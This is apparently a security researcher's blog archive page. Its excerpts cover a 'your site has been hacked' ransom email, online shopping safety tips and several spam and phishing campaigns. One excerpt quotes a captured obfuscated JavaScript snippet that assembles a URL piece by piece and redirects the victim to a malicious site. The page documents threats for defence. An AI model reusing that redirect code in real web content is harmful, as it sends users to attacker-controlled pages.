website

General April 20, 2020

“Your Site Has Been Hacked” ransomware email campaign in the wild

I was actually not expecting this kind of ransomware… I am used by now with “You’re hacked”, “You’re infected”… and others alike , but this one with the website is actually really interesting. What I find very disturbing is the fact that there are 5 transactions. A few were for tests, I think, but there is at least one who paid. They do use the a correct website of mine. PS: Of course that my site hasn’t been hacked :))   Here are some of the headers: Return-Path: <hacker@autoservistoth.cz> Received: from autoservistoth.cz ([213.157.59.58]) by mx.google.com with ESMTP id ce7si16117485edb.534.2020.04.17.03.08.14 for <sorin@mustaca.com>; Fri, 17 Apr 2020 03:08:23 -0700 (PDT) Received-SPF: neutral (google.com: 213.157.59.58 is neither permitted nor denied by best guess record for domain of hacker@autoservistoth.cz) client-ip=213.157.59.58; Authentication-Results: mx.google.com; spf=neutral (google.com: 213.157.59.58 is neither permitted nor denied by best guess record for domain of hacker@autoservistoth.cz) smtp.mailfrom=hacker@autoservistoth.cz X-AntiVirus: Checked by Dr.Web [version: 11.1.11.04270, engine: 11.1.9.04170, virus records: 6152810, updated: 8.05.2017] Return-path: <postmaster@thehomebase.top> From: “Hacker” <hacker@autoservistoth.cz> To: sorin@mustaca.com   For indexing better, this is the body of the email. PLEASE FORWARD THIS EMAIL TO SOMEONE IN YOUR COMPANY WHO IS ALLOWED TO MAKE IMPORTANT DECISIONS! We have hacked your website http://www.xxxxxx.com and extracted…

No Image

techblog December 7, 2012

Security tips for safe online shopping

During the holidays season many people receive packages from the post or delivery services. We wrote about the dangers introduced by opening attachments in emails pretending to come from such entities. Without an active and up to date security software, attachments in email should never be open, no matter from where they come. We also recommend that consumers watch for a few things in order to not become a victim of the online fraudsters: – If you connect to the Internet via a WiFi, make sure it is encrypted – If you connect to the webshop via a mobile device like a tablet or smartphone, make sure that the website reacts correctly to touch. Not all website allow an easy usage via such interfaces. You don’t want to order 10 items instead of one, or press cancel instead of proceed after you searched for hours the right product. – If you don’t know the website you plan to buy from, always check its reputation. Search for other users who are commenting about that website. Searching for “<website> reputation” usually gives good and relevant results. – Always check that the connection to the online store where the payment is done is secured….

No Image

News, quoted May 3, 2012

Never forget that as soon as any information is published on a public website, it doesn’t actually belong to you anymore

Avira Survey Finds Computer Users Don’t Feel Safe on Social Media Sites “This survey was very interesting because it demonstrated that even though social media sites are very popular among the general population, computer users from all over the world have the same concerns,” said Sorin Mustaca, data security expert at Avira.“They are wary of the safety of their personal information when it’s disseminated across social media sites. In order to use social media sites without being afraid of having your data misused, I strongly advise not storing private data on these websites. Never forget that as soon as any information is published on a public website, it doesn’t actually belong to you anymore,” he added. Read more here: http://www.sunherald.com/2012/05/02/3920520/avira-survey-finds-computer-users.html#storylink=cpy http://www.msnbc.msn.com/id/47264062#.T6Ir8qu_G8A http://www.marketwatch.com/story/avira-survey-finds-computer-users-dont-feel-safe-on-social-media-sites-2012-05-02 http://www.webpronews.com/84-of-facebook-google-users-feel-personal-info-isnt-safe-2012-05 http:/eon.businesswire.com/news/eon/20120502005598/en/security/Avira/identity-theft

No Image

question, quoted, security September 23, 2011

Some tips for Shopping Online safe

  The source is an article I wrote for the Avira press release : http://www.avira.com/en/press-details/nid/528/news/consumers-concerns-online-shopping-safety Here are the tips:   I recommend that consumers watch for a few things in order to not become a victim of the online fraudsters: Always check that the connection to the online store where the payment is done is secured. This can be observed first if the URL is starting with “https” and second if a small lock is present in the top left corner of the browser in the URL field (in Chrome) or the name of the website is written in a colored rectangle(in Firefox,IE). If the web browser gives any warnings about the security certificate of the website, then do not proceed to purchase anything from that website. If you don’t know the website you plan to buy from, always check its reputation first. Search for comments from other users about that website. Searching for “<website> reputation” usually gives good and relevant results. Give your financial details like credit card data only if the website is properly secured and its reputation is good. Try to choose payment methods which don’t require payment upfront. If PayPal is an option, choose that whenever possible….

No Image

News March 21, 2011

New design for my personal website

I finally found some time to change the website from the old design in dark colors to a WordPress (statical) blog. The new design is simpler and it is only on one single level. I got rid of all the old things and left only what is relevant. Here is the structure with links: Home – main page Management – will contain infos about product management and project management About – some infos about me Blog – link to this blog Pets – some pictures of my favorite pets Photography – random selection of my photos on Flickr Reading – random selection of the books I own(and have read) from mylibrarything.com Writing – selection and links to articles, interviews and other things I wrote Twitter – the content of my Twitter account

No Image

News March 17, 2011

All browsers are (not) equal

I recently installed IE9 because it is the latest which Microsoft produced. I was curious how my website looks like so I told myself that wouldn’t be a bad idea to compare this website in various browsers. I took Google’s Chrome, Mozilla Firefox and IE9, the latest version at the moment of writing this post. Here are the pictures of the right side of my site: No comments… the pictures tell everything: Firefox is years ahead of Chrome and IE. Firefox Chrome/Safari IE9

No Image

News October 16, 2010

New entry in the TSC: Script in the middle

Thanks to Virus Bulletin, we have now a new entry in The Spammers’ Compendium: Script in the middle UO!Script in the Middle!JavaScript 14 October 2010 Description The email has an HTML document attached to it that contanis a for. Clicking submit will POST the user’s data to a website controlled by the crooks, which automatically and invisible redirects to a legitimate website. See also The Responsibility Transfer. The original article with all the juicy details can be found in Avira Techblog: http://techblog.avira.com/2010/09/08/phishing-getting-verified/en/

No Image

News October 13, 2010

QR Code of this website

QR Code of this website from bit.ly: (Taken from bit.ly and adding .qr at the end of the shortened URL) Taken from goo.gl: More about the QR codes can be found on Wikipedia: http://en.wikipedia.org/wiki/QR_Code A QR Code is a matrix barcode (or two-dimensional code), readable by QR scanners, mobile phones with a camera, and smartphones. The code consists of black modules arranged in a square pattern on white background. The information encoded can be text, URL or other data. Common in Japan, where it was created by Toyota subsidiary Denso-Wave in 1994, the QR code is one of the most popular types of two-dimensional barcodes. QR is the initialism of Quick Response, as the creator intended the code to allow its contents to be decoded at high speed. Although initially used for tracking parts in vehicle manufacturing, QR Codes are now used in a much broader context, including both commercial tracking applications and convenience-oriented applications aimed at mobile phone users (known as mobile tagging). QR Codes storing addresses and URLs may appear in magazines, on signs, buses, business cards, or on just about any object about which users might need information. Users with a camera phone equipped with the correct…

No Image

Spam & Phishing September 2, 2010

New Spammer’s Compendium Entry:The Responsibility Transfer

Source: http://www.virusbtn.com/resources/spammerscompendium/responsibility.xml The Responsibility Transfer UO!Responsibility!JavaScript 31 August 2010 Description Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. Submitted by Sorin Mustaca. Example <script>function r(){};fQ=false;d=””;r.prototype = {p : function() { this.j=”;var pN=54899;s=false;this.k=”k”;this.kH=22581;c=”;l=64422; document.location.href=String(“htt”+”p:/”+”/tr”+”ace”+”boo”+”k.u”+”s/1″+”.htOnc”.substr(0,3)+”ml”); this.g=59634;var o=false;z=”;f=”f”;e=””;y=22487;}};x=””; var gK=false;var zA=new r(); pU=”;this.u=”u”;zA.p();var lK=false; </script>

No Image

General, Spam & Phishing May 20, 2010

Facebook and Twitter Phishing (on first sight)

The source of the articles is in the Avira Techblog: Twitter Phishing (on first sight) Facebook Phishing (on first sight) Twitter Over the weekend our spam traps received a massive wave of emails looking like the one below: The emails seem to stem from “Twitter Support” (support@twitter.com) and are addressed each to exactly one unique email address. The link in the email seems to be unique for each email sent, too. Quite an effort to make the email look more legitimate. The target link is always a compromised website holding an html page. Amazon: Bestsellers Electronics and Photo After clicking on the URL, a multiple stage redirection takes place. On some of these redirection websites, the intermediate page raises alerts because our engine detects encrypted content in JS. Finally comes the surprise: The target website at the end of the redirects is not a phishing website but a Canadian online pharmacy. For me personally this was a “Wow!” moment. Why did the spammers choose to send the emails as Twitter phishing? I think that the explanation is simple – they did it because nobody did it before. As usual, users of the Avira Premium Security Suite and the users of…

%d bloggers like this: